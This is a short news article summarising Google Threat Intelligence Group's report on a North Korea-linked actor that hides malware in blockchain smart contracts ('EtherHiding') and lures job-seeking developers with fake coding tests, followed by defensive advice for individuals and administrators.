Hackers linked to North Korea are using public blockchains to deliver malware and steal cryptocurrency from job-seeking developers.
Researchers at Google Threat Intelligence Group (GTIG) observed a threat actor it tracks as UNC5342 using a technique called “EtherHiding” to embed malicious code within a smart contract on a public blockchain, such as Ethereum or BNB Smart Chain.
“This approach essentially turns the blockchain into a decentralized and highly resilient command-and-control (C2) server,” GTIG explains.
The UNC5342 actor is using this technique as part of a broader social engineering campaign, says GTIG. In this campaign, the threat actors are targeting job-seeking developers in the social engineering and technology sectors.
Posing as fake recruiters, the attackers contact potential victims with attractive job offers, before asking them to perform a coding test or project review. This “assessment” manipulates the victim into downloading malicious code, either disguised as a job-related GitHub file or a video-call link.
Once the victim installs the initial malicious payload, the attacker is able to deploy second-stage malware via the EtherHiding technique, which enables them to steal sensitive data and cryptocurrency, and a more persistent third-stage backdoor, which gives them persistent remote access to the compromised system for long-term espionage.
A New Generation Of Malware Deployment
This is the first known case of a nation-state actor using the EtherHiding technique, the researchers say.
“EtherHiding represents a shift toward next-generation bulletproof hosting, where the inherent features of blockchain technology are repurposed for malicious ends.”
Because the code is stored on a decentralized and permissionless blockchain that can’t be modified or taken offline, EtherHiding makes it much harder to remove malware using conventional takedown efforts. This means that the malicious code typically remains active for as long as the blockchain itself is operational.
Additionally, the anonymous nature of blockchain transactions makes it difficult for law enforcement to trace the identity of attackers using this technique.
Once executed, it enables the attackers to carry out various malicious activities, such as displaying fake login pages and steal credentials, installing information-stealing malware, or deploying ransomware.
“This technique underscores the continuous evolution of cyber threats as attackers adapt and leverage new technologies to their advantage,” says GTIG.
Recommended Mitigation
Individuals that receive attractive job offers should remain vigilant and apply caution when asked to download anything, including job-related files and video conferencing software. Where possible, we recommend testing files in an isolated environment.
GTIG also urges administrators to place download restrictions on risky file types on Chrome Enterprise, assume full control of browser updates, and enforce strict web access and script execution policies.
